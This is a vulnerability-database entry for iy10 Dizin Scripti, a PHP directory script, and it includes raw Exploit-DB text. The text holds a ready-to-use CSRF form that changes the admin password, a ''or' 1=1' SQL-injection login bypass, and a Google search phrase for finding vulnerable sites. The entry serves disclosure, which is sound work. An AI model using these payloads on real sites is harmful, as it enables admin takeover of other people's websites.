iy10 Dizin Scripti Multiple Vulnerabilities (CSRF & Authentication Bypass)

vendor:

iy10 Dizin Scripti

by:

KnocKout

7,5

CVSS

HIGH

CSRF & Authentication Bypass

352, 287

CWE

Product Name: iy10 Dizin Scripti

Affected Version From: All Version

Affected Version To: All Version

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

iy10 Dizin Scripti Multiple Vulnerabilities (CSRF & Authentication Bypass)

A CSRF vulnerability exists in iy10 Dizin Scripti, which allows an attacker to change the admin password without authentication. Additionally, an authentication bypass vulnerability exists in the application, which allows an attacker to bypass authentication and gain access to the application.

Mitigation:

The application should use a secure random token for CSRF protection and should use a secure authentication mechanism.

Source

Exploit-DB raw data:

                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/           
iy10 Dizin Scripti   => Multiple Vulnerabilities (CSRF & Authentication Bypass)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Åžeker Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
					  KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All Version 
|~Software  : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword :  "Sitenizi dizine eklemek iÃ§in tÄ±klayÄ±n !"

################## ++ CSRF Admin Password Change Exploit ++ ######################################

<html>
  <body>
    <form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
      <input type="hidden" name="kullaniciadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
	  <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

################# ++ SQL Injection with Authentication Bypass ++###########################################

http://[TARGET]/admin 
ID: 'or' 1=1
PW : 'or' 1=1

############################################################